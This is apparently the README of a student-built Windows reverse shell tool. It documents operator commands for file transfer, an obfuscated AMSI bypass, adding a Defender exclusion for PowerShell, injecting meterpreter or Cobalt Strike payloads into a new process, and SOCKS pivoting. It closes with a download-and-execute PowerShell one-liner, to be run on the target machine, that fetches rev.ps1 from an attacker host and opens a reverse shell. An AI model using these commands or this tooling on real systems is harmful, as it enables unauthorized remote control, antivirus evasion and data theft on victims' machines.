A small windows reverse shell project that i build during my university intership.
It is written with Python and Powershell.
33333333333333333333333333333333333333333 but also 7 (~^-^)~
To simply install it:
- Clone this repo with the following code
git clone https://github.com/Fedami/powerrevshell---rev.ps1 - Run the following code to install all the requirements
pip install -r requirements.txt - Run the following code to make the .py file executable or simply run it with python
chmod +x powerrevshell.py or python3 powerrevshell.py
-h, --help show this help message and exit
-f folder smb folder for transfer funciontality
Enter folder name [Default: root]
-i local ip Enter your local IP [Default: ...]
-p port listener port for reverse shell [Default: 9001]
-wp webport listener port for http server [Default: 8000]
-sp smbport listener port for smb server [Default: 445]
-http Start http web server [Default: 8000]
-smb Start smb web server [Default: 445]
-k If ports are being used it will kill the process to force the exexcution.
Powerrevshell.py comes with several function accessible via the "menu" option:
The get and put functionality are build using TCPSocket to transfer files between the machines. To prevent data loss, on each message, are sent support string and md5sum to know if the actual bytes are sent correctly.
get <file.txt> / put <file.txt>
The smb-get functionality simply transfer a file using the Copy-Item cmdlet to the smbserver started using impacket-smbserver.
If you didn't start the program with the -smb switch or started youreself (impacket-smbserver) the command will fail.
smb-get <file.txt>
The down-file functionality simply download a file from the current machine to the target machine using HTTP server with python. If you didn't start the program with the -http switch or started youreself (python -m http.server 8000) the command will fail.
down-file <file.txt>
The down-file functionality simply load a powershell script from the current machine to the target machine using HTTP server with python. If you didn't start the program with the -http switch or started youreself (python -m http.server 8000) the command will fail.
load <file.ps1>
The amsi-bypass functionality will try to bypass AMSI on the current shell by using the Matt Graeber amsi bypass method obfuscated with two bytes array.
amsi-bypass
The exclude functionality will try to exclude powershell.exe from defender, admin permission are needed.
exclude
The payload functionality will try to create a new process and inject the shell payload that can be meterpreter or cobalt strike...
The payload must be a cs file.
payload <payload.cs>
Work used for the socks functionality: PowerProxy by get-get-get-get.
Socks-start start a socks proxy.
socks-start <L-PORT> <P-PORT>
You can also omit L-PORT and P-Port, by default L-PORT is 8080 and P-PORT is 1080.
socks-start
Socks-stop will stop any running socks on the target machine that was started before.
socks-stop
Socks will list if there is a running socks proxy.
socks
Close will terminate the session by killing the powershell process, if the command exclude was used it will delete the exclusion policy. Also if it was started a socks proxy it will kill it before killing the session.
close
Rev.ps1 is the powershell script to connect back to us.
To start the reverse shell run the following code on the target machine.
IEX (New-Object System.Net.WebClient).DownloadString('http://<IP>:<PORT>/rev.ps1'); Send-Shell -i <IP> -p <ShellPort>